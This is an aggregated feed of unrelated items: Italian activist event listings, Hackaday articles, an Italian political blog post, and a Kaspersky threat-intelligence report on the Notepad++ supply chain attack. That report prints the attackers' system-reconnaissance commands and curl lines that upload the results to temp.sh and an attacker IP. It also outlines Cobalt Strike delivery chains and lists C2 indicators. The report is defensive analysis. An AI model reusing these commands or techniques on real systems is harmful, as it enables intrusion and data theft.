BENEFIT INGUAIATX: SOTHIAC + THE HOUSE OF WAX

collettivo anarchico Bandiera Nera - viale Monza 255
(sabato, 7 febbraio 21:30)

puntello.org/event/benefit-ing…

PROIEZIONE "NUMERO ZERO"

Mezcal Squat - Parco della Certosa Irreale - Collegno (TO)
(mercoledì, 4 febbraio 17:30)

Numero zero é un documentario sulle origini dell'hh in Italia.

Per divulgare l'attitudine di questa cultura e scoprire le sue discipline, che continuano ad essere emancipazione nonostante il capitale ci rubi ogni cosa per i proprio interessi.

Salutiamo con la manina Netflix e Prime Video, da noi é tutto gratis!

CUCINA APERTA DALLE 18.

--------------------------------------

Il Mezcal Squat è uno spazio autogestito e le attività svolte al suo interno si basano sulla condivisione. Non vi è circolo di denaro. Porta quello che vorresti trovare. Utilizza la cucina e prepara quello che vuoi da mangiare.

SOLO COMPLICI E SOLIDALI, NESSUN CLIENTE!

--------------------------------------

COME RAGGIUNGERE IL MEZCAL SQUAT

BUS : 33 - CP1 - 76 - 44

TRENO : FERMATA COLLEGNO

METRO : FERMI

--------------------------------------

NO MACI, NO FASCI, NO SBIRRI

gancio.cisti.org/event/proiezi…

BAGNA CAUDA VEGANA E NON

Mezcal Squat - Parco della Certosa Irreale - Collegno (TO)
(mercoledì, 11 febbraio 15:00)

AGLIO NIGHT, CI VUOLE CORAGGIO.

PORTA VERDURINE, NOI PREPARIAMO LA BAGNA. (Se vuoi prepararla con noi sei lu benvenutxx!)

--------------------------------------

Il Mezcal Squat è uno spazio autogestito e le attività svolte al suo interno si basano sulla condivisione. Non vi è circolo di denaro. Porta quello che vorresti trovare. Utilizza la cucina e prepara quello che vuoi da mangiare.

SOLO COMPLICI E SOLIDALI, NESSUN CLIENTE!

--------------------------------------

COME RAGGIUNGERE IL MEZCAL SQUAT

BUS : 33 - CP1 - 76 - 44

TRENO : FERMATA COLLEGNO

METRO : FERMI

--------------------------------------

NO MACI, NO FASCI, NO SBIRRI

gancio.cisti.org/event/bagna-c…

MEZCALEDÌ SPOSTATO A LUNEDÌ 16

Mezcal Squat - Parco della Certosa Irreale - Collegno (TO)
(mercoledì, 18 febbraio 00:00)

Lunedì 16 mezcaledì+ concerto punk con Taglio, henker faust e Pesticidi.

gancio.cisti.org/event/mezcale…

K A R A O K E

Mezcal Squat - Parco della Certosa Irreale - Collegno (TO)
(mercoledì, 25 febbraio 18:00)

L'evento più atteso dell'anno sta per tornare! Porta le cuffie da cantiere oppure il tuo sogno musicale più alto da cantare assieme ax tux compagnx del cuore!

--------------------------------------

Il Mezcal Squat è uno spazio autogestito e le attività svolte al suo interno si basano sulla condivisione. Non vi è circolo di denaro. Porta quello che vorresti trovare. Utilizza la cucina e prepara quello che vuoi da mangiare.

SOLO COMPLICI E SOLIDALI, NESSUN CLIENTE!

--------------------------------------

COME RAGGIUNGERE IL MEZCAL SQUAT

BUS : 33 - CP1 - 76 - 44

TRENO : FERMATA COLLEGNO

METRO : FERMI

--------------------------------------

NO MACI, NO FASCI, NO SBIRRI

gancio.cisti.org/event/k-a-r-a…

Antifanzine #18 e #19

Zazie nel metrò - Via Ettore Giovenale 16, Roma
(giovedì, 5 febbraio 19:00)

Giovedì 5 febbraio

Alle 19 da Zazie nel Metrò

Presentazione degli ultimi due numeri di Antifa!nzine.

Il carcere come strumento di repressione e controllo sociale è il filo rosso che attraversa gli albi numero 18 e 19. Due uscite che rifiutano la narrazione del carcere come spazio di rieducazione o necessità, e lo leggono invece come dispositivo politico centrale nella gestione del conflitto sociale.

Insieme alla redazione e a diversi ospiti discuteremo dei due numeri e del tema della repressione della solidarietà alla lotta palestinese, all’interno di un confronto più ampio sulle pratiche repressive contro attivistə e movimenti.

La presentazione si inserisce nella cornice di 100x100 Gaza, una mobilitazione straordinaria di solidarietà nata per rispondere collettivamente al genocidio in corso contro la popolazione palestinese.

Non mancate!

roma.convoca.la/event/antifanz…

Presentazione de libro Astrologia per donne libere e ribelli con Astronza

Luna e le Altre - Largo Nicolò Cannella 17
(domenica, 8 febbraio 13:00)

Domenica 8 febbraio, presentazione del libro Astrologia per donne libere e ribelli, con l'autrice Astronza. Ore 13h pranzo veg, ore 15h presentazione del libro e previsioni dal cielo per il 2026. A Luna e le Altre, Spinaceto, Largo Niccolò Cannella.

Evento separato no maschi cis

roma.convoca.la/event/presenta…

Proiezione Prima Internazionale PRO PAL Documentario IT/EN 2026, (82 min)

Biblioteca Libertaria F. Ferrer - Piazza Embriaci 5/13
(giovedì, 5 febbraio 18:00)

Vi invitiamo alla prima internazionale del documentario Pro - Pal che tratta della solisarietà con il popolo palestinese e pone l'accento sull'attivismo solidale in Italia e in Germania.

A cura di G.A.Z.A. Project

gancio.invegendo.org/event/pro…

Le foibe e il rovesciamento della Storia - Inaugurazione Semana Santa Antifascista

Sede PRC Bianchini - Piazza Romagnosi 2r
(venerdì, 6 febbraio 18:30)

Inaugurazione Semana Santa Antifascista. Fuori dal cono di luce Le foibe e il rovesciamento della Storia.

Di fronte alle iniziative che utilizzano la commemorazione delle foibe come legittimazione di fascismo e neofascismo, si riafferma una memoria partigiana, antifascista memore del conflitto di classe.

gancio.invegendo.org/event/le-…

Mercatino Let Eat Bi

Biella - Cittadellarte, Fondazione Pistoletto - Via Serralunga 27, Biella
(mercoledì, 4 febbraio 10:00)

Primo mercatino di febbraio.

caosbi.eu/event/mercatino-let-…

Introduction

On February 2, 2026, the developers of Notepad++, a text editor popular among developers, published a statement claiming that the update infrastructure of Notepad++ has been compromised. According to the statement, this was due to a hosting provider level incident, which occurred from June to September 2025. However, attackers were able to retain access to internal services until December 2025.

Multiple execution chains and payloads

Having checked our telemetry related to this incident, we have been amazed to find out how different and unique were the execution chains used in this supply chain attack. We identified that over the course of four months, from July to October 2025, attackers who have compromised Notepad++ have been constantly rotating C2 server addresses used for distributing malicious updates, the downloaders used for implant delivery, as well as the final payloads.

We observed three different infection chains overall designed to attack about a dozen machines, belonging to:

• Individuals located in Vietnam, El Salvador and Australia;
• A government organization located in the Philippines;
• A financial organization located in El Salvador;
• An IT service provider organization located in Vietnam.

Despite the variety of payloads observed, Kaspersky solutions have been able to block the identified attacks as they occurred.

In this article, we describe the variety of the infection chains we observed in the Notepad++ supply chain attack, as well as provide numerous previously unpublished IoCs related to it.

Chain #1 — late July and early August 2025

We observed attackers to deploy a malicious Notepad++ update for the first time in late July 2025. It was hosted at 45.76.155[.]202/update/update.… Notably, the first scan of this URL on the VirusTotal platform occurred in late September, by a user from Taiwan.

The update.exe file downloaded from this URL (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was launched by the legitimate Notepad++ updater process, GUP.exe. This file turned out to be a NSIS installer, of about 1 MB in size. When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:

1. The file creates a directory named %appdata%\ProShow and sets it as the current directory;
2. It executes the shell command cmd /c whoami&&tasklist > 1.txt, thus creating a file with the shell command execution results in the %appdata%\ProShow directory;
3. Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
4. Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202 shell command. As can be observed, the uploaded file URL is transferred inside the user agent.

Notably, the same behavior of malicious Notepad++ updates, specifically the launch of shell commands and the use of the temp[.]sh website for file uploading, has been described on the Notepad++ community forums by a user named soft-parsley.

After sending system information, the update.exe file executes the second-stage payload. To do that, it performs the following actions:

• Drops the following files to the %appdata%\ProShow directory:
  
  • ProShow.exe (SHA1: defb05d5a91e4920c9e22de2d81c5dc9b95a9a7c)
  • defscr (SHA1: 259cd3542dea998c57f67ffdd4543ab836e3d2a3)
  • if.dnt (SHA1: 46654a7ad6bc809b623c51938954de48e27a5618)
  • proshow.crs (SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709)
  • proshow.phd (SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709)
  • proshow_e.bmp (SHA1: 9df6ecc47b192260826c247bf8d40384aa6e6fd6)
  • load (SHA1: 06a6a5a39193075734a32e0235bde0e979c27228)

  
  

• Executes the dropped ProShow.exe file.

The launched ProShow.exe file is a legitimate ProShow software, which is abused to launch a malicious payload. Normally, when threat actors aim to execute a malicious payload inside a legitimate process, they resort to the DLL sideloading technique. However, this time attackers have decided to avoid using it — likely due to how much attention this technique receives nowadays. Instead, they abused an old, known vulnerability in the ProShow software, which dates back to early 2010s. The dropped file named load contains an exploit payload, which is launched when the ProShow.exe file is launched. It is worth noting that, apart from this payload, all files in the %appdata%\ProShow directory are legitimate.

Analysis of the exploit payload revealed that it contains two shellcodes — one at the very start and the other one in the middle of the file. The shellcode located at the start of the file contains a set of meaningless instructions and is not designed to be executed — rather, attackers used it as the exploit padding bytes. It is likely that, by using a fake shellcode for padding bytes instead of something else (e.g., a sequence of 0x41 characters or random bytes), attackers aimed to confuse researchers and automated analysis systems.

The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL 45.77.31[.]210/users/admin (user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36) and launches it.

The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL 45.77.31[.]210/api/update/v1 and the POST request URL 45.77.31[.]210/api/FileUpload/…

Later on, in early August 2025, we have observed attackers to use the same download URL for the update.exe files (observed SHA1 hash: 90e677d7ff5844407b9c073e3b7e896e078e11cd), as well as the same execution chain for delivery of Cobalt Strike Beacon via malicious Notepad++ updates. However, we noted the following differences:

• In the Metasploit downloader payload, the URL for downloading Cobalt Strike Beacon was set to cdncheck.it[.]com/users/admin;
• The Cobalt Strike C2 server URLs were set to cdncheck.it[.]com/api/update/v… and cdncheck.it[.]com/api/Metadata…

We have not further seen any infections leveraging chain #1 after early August 2025.

Chain #2 — middle and end of September 2025

A month and a half after malicious update detections ceased, we observed attackers to resume deploying these updates in the middle of September 2025, using another infection chain. The malicious update was still being distributed from the 45.76.155[.]202/update/update.… URL, and the file downloaded from it (SHA1 hash: 573549869e84544e3ef253bdba79851dcde4963a) was an NSIS installer as well. However, its file size was now about 140 KB. Again, this file performed two actions:

• Obtained system information by executing a shell command and uploading its execution results to temp[.]sh;
• Dropped a next-stage payload on disk and launched it.

Regarding system information, attackers made the following changes to how it was collected:

• They changed the working directory to %APPDATA%\Adobe\Scripts;
• They started collecting more system information details, changing the executed shell command to cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt.

The created a.txt file was, just as in the case of stage #1, uploaded to the temp[.]sh website through curl, with the obtained temp[.]sh URL being transferred to the same 45.76.155[.]202/list endpoint, inside the User-Agent header.

As for the next-stage payload, it has been changed completely. The NSIS installer was configured to drop the following files to the %APPDATA%\Adobe\Scripts directory:

• alien.dll (SHA1: 6444dab57d93ce987c22da66b3706d5d7fc226da);
• lua5.1.dll (SHA1: 2ab0758dda4e71aee6f4c8e4c0265a796518f07d);
• script.exe (SHA1: bf996a709835c0c16cce1015e6d44fc95e08a38a);
• alien.ini (SHA1: ca4b6fe0c69472cd3d63b212eb805b7f65710d33).

Next, it executes the following shell command to launch the script.exe file: %APPDATA%\%Adobe\Scripts\script.exe %APPDATA%\Adobe\Scripts\alien.ini.

All of the files in the %APPDATA%\Adobe\Scripts directory, except for alien.ini, are legitimate and related to the Lua interpreter. As such, the previously mentioned command is used by attackers to launch a compiled Lua script, located in the alien.ini file. Below is a screenshot of its decompilation:

As we can see, this small script is used for placing shellcode inside executable memory and then launching it through the EnumWindowStationsW API function.

The launched shellcode is, just in the case of chain #1, a Metasploit downloader, which downloads a Cobalt Strike Beacon payload, again in the form of a shellcode, from the cdncheck.it[.]com/users/admin URL.

The Cobalt Strike payload contains the C2 server URLs that slightly differ from the ones seen previously: cdncheck.it[.]com/api/getInfo/… and cdncheck.it[.]com/api/FileUplo…

Attacks involving chain #2 continued until the end of September, when we observed two more malicious update.exe files. One of them had the SHA1 hash 13179c8f19fbf3d8473c49983a199e6cb4f318f0. The Cobalt Strike Beacon payload delivered through it was configured to use the same URLs observed in mid-September, however, attackers changed the way system information was collected. Specifically, attackers split the single shell command they used for this (cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt) into multiple commands:

• cmd /c whoami >> a.txt
• cmd /c tasklist >> a.txt
• cmd /c systeminfo >> a.txt
• cmd /c netstat -ano >> a.txt

Notably, the same sequence of commands has been previously documented by the soft-parsley user on the Notepad++ community forums.

The other update.exe file had the SHA1 hash 4c9aac447bf732acc97992290aa7a187b967ee2c. Using it, attackers performed the following:

• Changed the system information upload URL to self-dns.it[.]com/list;
• Changed the user agent used in HTTP requests to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36;
• Changed the URL used by the Metasploit downloader to safe-dns.it[.]com/help/Get-Sta…
• Changed the Cobalt Strike Beacon C2 server URLs to safe-dns.it[.]com/resolve and safe-dns.it[.]com/dns-query.

Chain #3 — October 2025

In early October 2025, attackers changed the infection chain once again. They have as well changed the C2 server for distributing malicious updates, with the observed update URL being 45.32.144[.]255/update/update.… The payload downloaded (SHA1: d7ffd7b588880cf61b603346a3557e7cce648c93) was still a NSIS installer, however, unlike in the case of chains 1 and 2, this installer did not include the system information sending functionality. It simply dropped the following files to the %appdata%\Bluetooth\ directory:

• BluetoothService.exe, a legitimate executable (SHA1: 21a942273c14e4b9d3faa58e4de1fd4d5014a1ed);
• log.dll, a malicious DLL (SHA1: f7910d943a013eede24ac89d6388c1b98f8b3717);
• BluetoothService, an encrypted shellcode (SHA1: 7e0790226ea461bcc9ecd4be3c315ace41e1c122).

This execution chain relies on the sideloading of the log.dll file, which is responsible for launching the encrypted BluetoothService shellcode into the BluetoothService.exe process. Notably, such execution chains are commonly used by Chinese-speaking threat actors. This particular execution chain has already been described by Rapid7, and the final payload observed in it is the custom Chrysalis backdoor.

Unlike the previous chains, chain #3 does not load a Cobalt Strike Beacon directly. However, in their article Rapid7 claim that they additionally observed a Cobalt Strike Beacon payload being deployed to the C:\ProgramData\USOShared folder, while conducting incident response on one of the machines infected with the Notepad++ supply chain attack. Whilst Rapid7 does not detail how this file was dropped to the victim machine, we can highlight the following similarities between that Beacon payload and the Beacon payloads observed in chains #1 and #2:

1. In both cases, Beacons are loaded through a Metasploit downloader shellcode, with similar URLs used (api.wiresguard.com/users/admin for the Rapid7 payload, cdncheck.it.com/users/admin and 45.77.31[.]210/users/admin for chain #1 and chain #2 payloads);
2. The Beacon configurations are encrypted with the XOR key CRAZY;
3. Similar C2 server URLs are used for Cobalt Strike Beacon communications (i.e. api.wiresguard.com/api/FileUpload/submit for the Rapid7 payload and 45.77.31[.]210/api/FileUpload/… for the chain #1 payload).

Return of chain #2 and changes in URLs — October 2025

In mid-October 2025, we observed attackers to resume deployments of the chain #2 payload (SHA1 hash: 821c0cafb2aab0f063ef7e313f64313fc81d46cd) using yet another URL: 95.179.213[.]0/update/update.e… Still, this payload used the previously mentioned self-dns.it[.]com and safe-dns.it[.]com domain names for system information uploading, Metasploit downloader and Cobalt Strike Beacon communications.

Further in late October 2025, we observed attackers to start changing URLs used for malicious update deliveries. Specifically, attackers started using the following URLs:

• 95.179.213[.]0/update/install.…
• 95.179.213[.]0/update/update.e…
• 95.179.213[.]0/update/AutoUpda…

We haven’t observed any new payloads deployed from these URLs — they involved usage of both #2 and #3 execution chains. Finally, we have not seen any payloads being deployed starting from November 2025.

Conclusion

Notepad++ is a text editor used by numerous developers. As such, the ability to control update servers of this software gave attackers a unique possibility to break into machines of high-profile organizations around the world. The attackers made an effort to avoid losing access to this infection vector — they were spreading the malicious implants in a targeted manner, and they were skilled enough to drastically change the infection chains about once a month. Whilst we identified three distinct infection chains during our investigation, we would not be surprised to see more of them in use. To sum up our findings, here is the overall timeline of the infection chains that we identified:

The variety of infection chains makes detection of the Notepad++ supply chain attack quite a difficult and at the same time creative task. We would like to propose the following methods, from generic to specific, to hunt down traces of this attack:

• Check systems for deployments of NSIS installers, which have been used in all three observed execution chains. For example, this can be done by looking for logs related to creations of the %localappdata%\Temp\ns.tmp directory, made by NSIS installers at runtime. Make sure to investigate the origins of each identified NSIS installer to avoid false positives;
• Check network traffic logs for DNS resolutions of the temp[.]sh domain, which is unusual to observe in corporate environments. Also, it is beneficial to conduct a check for raw HTTP traffic requests that have a temp[.]sh URL embedded in the user agent — both these steps will make it possible to detect chain #1 and chain #2 deployments;
• Check systems for launches of malicious shell commands referenced in the article, such as whoami, tasklist, systeminfo and netstat -ano;
• Use specific IoCs listed below to identify known malicious domains and files.

Indicators of compromise

URLs used for malicious Notepad++ update deployments
45.76.155[.]202/update/update.…
45.32.144[.]255/update/update.…
95.179.213[.]0/update/update.e…
95.179.213[.]0/update/install.…
95.179.213[.]0/update/AutoUpda…

System information upload URLs
45.76.155[.]202/list
self-dns.it[.]com/list

URLs used by Metasploit downloaders to deploy Cobalt Strike beacons
45.77.31[.]210/users/admin
cdncheck.it[.]com/users/admin
safe-dns.it[.]com/help/Get-Sta…

URLs used by Cobalt Strike Beacons delivered by malicious Notepad++ updaters
45.77.31[.]210/api/update/v1
45.77.31[.]210/api/FileUpload/…
cdncheck.it[.]com/api/update/v…
cdncheck.it[.]com/api/Metadata…
cdncheck.it[.]com/api/getInfo/…
cdncheck.it[.]com/api/FileUplo…
safe-dns.it[.]com/resolve
safe-dns.it[.]com/dns-query

URLs used by the Chrysalis backdoor and the Cobalt Strike Beacon payloads associated with it, as previously identified by Rapid7
api.skycloudcenter[.]com/a/cha…
api.wiresguard[.]com/update/v1
api.wiresguard[.]com/api/FileU…

URLs related to Cobalt Strike Beacons uploaded to multiscanners, as previously identified by Rapid7
59.110.7[.]32:8880/uffhxpSy
59.110.7[.]32:8880/api/getBasi…
59.110.7[.]32:8880/api/Metadat…
124.222.137[.]114:9999/3yZR31V…
124.222.137[.]114:9999/api/upd…
124.222.137[.]114:9999/api/Inf…
api.wiresguard[.]com/users/sys…
api.wiresguard[.]com/api/getIn…

Malicious updater.exe hashes
8e6e505438c21f3d281e1cc257abdbf7223b7f5a
90e677d7ff5844407b9c073e3b7e896e078e11cd
573549869e84544e3ef253bdba79851dcde4963a
13179c8f19fbf3d8473c49983a199e6cb4f318f0
4c9aac447bf732acc97992290aa7a187b967ee2c
821c0cafb2aab0f063ef7e313f64313fc81d46cd

Hashes of malicious auxiliary files
06a6a5a39193075734a32e0235bde0e979c27228 — load
9c3ba38890ed984a25abb6a094b5dbf052f22fa7 — load
ca4b6fe0c69472cd3d63b212eb805b7f65710d33 — alien.ini
0d0f315fd8cf408a483f8e2dd1e69422629ed9fd — alien.ini
2a476cfb85fbf012fdbe63a37642c11afa5cf020 — alien.ini

Malicious file hashes, as previously identified by Rapid7
d7ffd7b588880cf61b603346a3557e7cce648c93
94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8
21a942273c14e4b9d3faa58e4de1fd4d5014a1ed
7e0790226ea461bcc9ecd4be3c315ace41e1c122
f7910d943a013eede24ac89d6388c1b98f8b3717
73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf
bd4915b3597942d88f319740a9b803cc51585c4a
c68d09dd50e357fd3de17a70b7724f8949441d77
813ace987a61af909c053607635489ee984534f4
9fbf2195dee991b1e5a727fd51391dcc2d7a4b16
07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51
3090ecf034337857f786084fb14e63354e271c5d
d0662eadbe5ba92acbd3485d8187112543bcfbf5
9c0eff4deeb626730ad6a05c85eb138df48372ce

Malicious file paths
%appdata%\ProShow\load
%appdata%\Adobe\Scripts\alien.ini
%appdata%\Bluetooth\BluetoothService

securelist.com/notepad-supply-…

Originally released for the Sony PlayStation in 1998, Resident Evil 2 came on two CDs and used 1.2 GB in total. Of this, full-motion video (FMV) cutscenes took up most of the space, as was rather common for PlayStation games. This posed a bit of a challenge when ported to the Nintendo 64 with its paltry 64 MB of cartridge-based storage. Somehow the developers managed to do the impossible and retain the FMVs, as detailed in a recent video by [LorD of Nerds]. Toggle the English subtitles if German isn’t among your installed natural language parsers.

Instead of dropping the FMVs and replacing them with static screens, a technological improvement was picked. Because of the N64’s rather beefy hardware, it was possible to apply video compression that massively reduced the storage requirements, but this required repurposing the hardware for tasks it was never designed for.

The people behind this feat were developers at Angel Studios, who had 12 months to make it work. Ultimately they achieved a compression ratio of 165:1, with software decoding handling the decompressing and the Reality Signal Processor (RSP) that’s normally part of the graphics pipeline used for both audio tasks and things like upscaling.

Texture resolution had to be reduced for the N64 port.
In the video you can see the side by side comparisons of the PS and N64 RE2 cutscenes, with differences clearly visible, but not necessarily for the worse. Uncompressed, the about fifteen minutes of FMVs in the game with a resolution of 320×160 pixels at 24 bits take up 4 GB. For the PS this was solved with some video compression and a dedicated video decoder, since its relatively weak hardware needed all the help it could get.

On the N64 port, however, only 24 MB was left on a 64 MB cartridge after the game’s code and in-game assets had been allocated. The first solution was chroma subsampling, counting on the human eye’s sensitivity to brightness rather than color. One complication was that the N64 didn’t implement color clamping, requiring brightness to be multiplied rather than simply added up before the result was passed on to the video hardware in RGB format.

Very helpful here was that the N64 relied heavily on DMA transfers, allowing the framebuffer to be filled without a lot of marshaling which would have tanked performance. In addition to this the RSP was used with custom microcode to enable upscaling as well as interpolation between frames and audio, with about half the frames of the original dropped and instead interpolated. All of this helped to reduce the FMVs to fit in 24 MB rather than many hundreds of MBs.

For the audio side of things the Angel Studios developers got a break, as the Factor 5 developers – famous for Star Wars titles on the N64 – had already done the heavy lifting here with their MusyX audio tools. This enables sample-based playback, saving a lot of memory for music, while for speech very strong compression was used.

Also argued in the video is that the N64 version is actually superior to the PS version, due to its superior Z-buffering and anti-aliasing feature, as well as new features such as randomized items. The programmable RSP is probably the real star on the N64, which preceded the introduction of programmable pipelines on PC videocards like the NVIDIA GeForce series.

youtube.com/embed/e_6mxw7w1WE?…

hackaday.com/2026/02/03/how-re…

Over on YouTube you can see [Yang-Hui He] present to The Royal Institution about Mathematics: The rise of the machines.

In this one hour presentation [Yang-Hui He] explains how AI is driving progress in pure mathematics. He says that right now AI is poised to change the very nature of how mathematics is done. He is part of a community of hundreds of mathematicians pursuing the use of AI for research purposes.

[Yang-Hui He] traces the genesis of the term “artificial intelligence” to a research proposal from J. McCarthy, M.L. Minsky, N. Rochester, and C.E. Shannon dated August 31, 1955. He says that his mantra has become: connectivism leads to emergence, and goes on to explain what he means by that, then follows with universal approximation theorems.

He goes on to enumerate some of the key moments in AI: Descartes’s bête-machine, 1617; Lovelace’s speculation, 1842; Turing test, 1949; Dartmouth conference, 1956; Rosenblatt’s Perceptron, 1957; Hopfield’s network, 1982; Hinton’s Boltzmann machine, 1984; IBM’s Deep Blue, 1997; and DeepMind’s AlphaGo, 2012.

He continues with some navel-gazing about what is mathematics, and what is artificial intelligence. He considers how we do mathematics as bottom-up, top-down, or meta-mathematics. He mentions about one of his earliest papers on the subject Machine-learning the string landscape (PDF) and his books The Calabi–Yau Landscape: From Geometry, to Physics, to Machine Learning and Machine Learning in Pure Mathematics and Theoretical Physics.

He goes on to explain about Mathlib and the Xena Project. He discusses Machine-Assisted Proof by Terence Tao (PDF) and goes on to talk more about the history of mathematics and particularly experimental mathematics. All in all a very interesting talk, if you can find a spare hour!

In conclusion: Has AI solved any major open conjecture? No. Is AI beginning to help to advance mathematical discovery? Yes. Has AI changed the speaker’s day-to-day research routine? Yes and no.

If you’re interested in more fun math articles be sure to check out Digital Paint Mixing Has Been Greatly Improved With 1930s Math and Painted Over But Not Forgotten: Restoring Lost Paintings With Radiation And Mathematics.

youtube.com/embed/oOYcPkBaotg?…

hackaday.com/2026/02/02/yang-h…

noblogo.org/transit/decreto-si…

Transit

2026-02-03 08:15:17

Decreto sicurezza: da Torino alla deriva autoritaria.

(203)

Dopo gli scontri di #Torino di sabato scorso, il governo #Meloni ha colto l’occasione per accelerare su un nuovo decreto sicurezza, trasformando un episodio di violenza circoscritto in pretesto per una stretta repressiva sul dissenso.

Non si tratta di una reazione improvvisata, ma dell’evoluzione di un’idea di “sicurezza” che parte da lontano nella strategia della destra al potere, radicata nei pacchetti sicurezza del passato e in una narrazione binaria tra “buoni cittadini” e “teppisti” da contenere a ogni costo.

Il contenuto del decreto (perquisizioni immediate sul posto, fermi preventivi fino a 12 ore senza vaglio giudiziario, cauzioni obbligatorie per gli organizzatori di cortei e uno “scudo penale” ampliato per le forze dell’ordine) mira a rendere costoso e rischioso l’esercizio del diritto di manifestare, spostando l’equilibrio verso un potere discrezionale della polizia quasi illimitato.

Questa logica trasforma l’ordine pubblico in stato d’eccezione permanente: un corteo violento a Torino diventa grimaldello per limitare proteste pacifiche, centri sociali e sindacati conflittuali, colpendo il cuore dell’uguaglianza democratica e rendendo la piazza un privilegio per chi ha risorse economiche.

Le origini di questa repressione affondano nelle precedenti norme del governo, come il primo decreto sicurezza con oltre sessanta misure su immigrazione, blocchi navali e tutele alle forze dell’ordine, che già riprendevano la retorica securitaria inaugurata anni fa da altre destre.

Culturalmente, è il trionfo di una visione che legge l’insicurezza sociale solo come minaccia da reprimere, ignorando le sue radici in disuguaglianze e mancata redistribuzione, per normalizzare un clima di sospetto verso chiunque dissenta.

Ma i profili costituzionali sono il vero nodo: l’uso del decreto-legge viola l’articolo 77, che richiede reale urgenza e non un pretesto politico per aggirare il Parlamento, come già contestato da costituzionalisti sui provvedimenti passati.

Le restrizioni su riunioni e manifestazioni (artt. 17 e 21 della #Costituzione) appaiono sproporzionate, con fermi e divieti basati su semplici denunce che erodono garanzie fondamentali, mentre lo scudo penale rischia di ledere l’uguaglianza davanti alla legge (art. 3) e i pesi e contrappesi dello Stato di diritto. Organismi internazionali hanno già ammonito l’Italia su queste derive, che comprimono il dissenso pacifico in modo inaccettabile.

In fondo, non è solo un pacchetto norme: è una scelta politica netta, che governa conflitti sociali con polizia e codice penale anziché con dialogo e politiche inclusive. Torino è solo la scintilla; il fuoco è un modello di democrazia sempre più autoritario, dove il garantismo cede il passo a un esecutivo onnipotente. Resta da vedere se il Parlamento e la Consulta porranno rimedio a questa deriva, ma non si può essere troppo ottimisti. Pure la speranza potrebbe essere scambiata per pericolosa provocazione.

#Blog #DecretoSicurezza #GovernoMeloni #Politica #Società #DirittiCivili

Mastodon: @alda7069@mastodon.unoTelegram: t.me/transitblogFriendica: @danmatt@poliverso.orgBlue Sky: bsky.app/profile/mattiolidanie…Bio Site (tutto in un posto solo, diamine): bio.site/danielemattioli

Gli scritti sono tutelati da “Creative Commons” (qui)

Tutte le opinioni qui riportate sono da considerarsi personali. Per eventuali problemi riscontrati con i testi, si prega di scrivere a: corubomatt@gmail.com

Transit

Il blog di Alessandra Corubolo & Daniele Mattioli. On line -in varie forme- dal 2005.

^Telegram

The KDE desktop’s new login manager (PLM) in the upcoming Plasma 6.6 will mark the first time that KDE requires that the underlying OS uses systemd, if one wishes for the full KDE experience. This has especially the FreeBSD community upset, but will also affect Linux distros that do not use systemd. The focus of the KDE team is clear, as stated in the referenced Reddit thread, where a KDE developer replies that the goal is to rely on systemd for more tasks in the future. This means that PLM is just the first step.

In the eyes of KDE it seems that OSes that do not use systemd are ‘niche’ and not worth supporting, with said niche Linux distros that would be cut out including everything from Gentoo to Alpine Linux and Slackware. Regardless of your stance on systemd’s merits or lack thereof, it would seem to be quite drastic for one of the major desktop environments across Linux and BSD to suddenly make this decision.

It also raises the question of in how far this is related to the push towards a distroless and similarly more integrated, singular version of Linux as an operating system. Although there are still many other DEs that will happily run for the foreseeable future on your flavor of GNU/Linux or BSD – regardless of whether you’re more about about a System V or OpenRC init-style environment – this might be one of the most controversial divides since systemd was first introduced.

Top image: KDE Plasma 6.4.5. (Credit: Michio.kawaii, Wikimedia)

hackaday.com/2026/02/02/kde-bi…

[XYZAiden]’s concept for a flexible robotic gripper might be a few years old, but if anything it’s even more accessible now than when he first prototyped it. It uses only a single motor and requires no complex mechanical assembly, and nowadays 3D printing with flexible filament has only gotten easier and more reliable.

The four-armed gripper you see here prints as a single piece, and is cable-driven with a single metal-geared servo powering the assembly. Each arm has a nylon string threaded through it so when the servo turns, it pulls each string which in turn makes each arm curl inward, closing the grip. Because of the way the gripper is made, releasing only requires relaxing the cables; an arm’s natural state is to fall open.

The main downside is that the servo and cables are working at a mechanical disadvantage, so the grip won’t be particularly strong. But for lightweight, irregular objects, this could be a feature rather than a bug.

The biggest advantage is that it’s extremely low-cost, and simple to both build and use. If one has access to a 3D printer and can make a servo rotate, raiding a junk bin could probably yield everything else.

DIY robotic gripper designs come in all sorts of variations. For example, this “jamming” bean-bag style gripper does an amazing, high-strength job of latching onto irregular objects without squashing them in the process. And here’s one built around grippy measuring tape, capable of surprising dexterity.

youtube.com/embed/8F8gctNCGyE?…

hackaday.com/2026/02/02/print-…

Odiamo Ogni Maledettissimo Lunedì

Cascina Torchiera - Piazzale Cimitero Maggio 18, Milano
(lunedì, 9 febbraio 19:00)

Vi aspettiamo dalle 19, come ogni stramaledettissimo lunedì dell'anno con

• il "Mercatork" di frutta, verdura e autoproduzioni
• la libreria/biblioteca "Bibliotork"
• il corso di Yoga
• le prove della "Banda degli Ottoni a Scoppio"
• Cena Popolare Vegana
• Musica/Proiezioni/Presentazioni/Dibattiti (restate aggiornatx)
• Convivialità & Autogestione

In questo spazio si pratica l’autogestione come espressione di responsabilità verso se stess* e tutto ciò che ci circonda. Come uno strumento di libertà e liberazione dai canoni del consumismo, come presa in carico del benessere collettivo e del pianeta

Quindi ricordati di lavare piatto e posate nell’area lavastoviglie

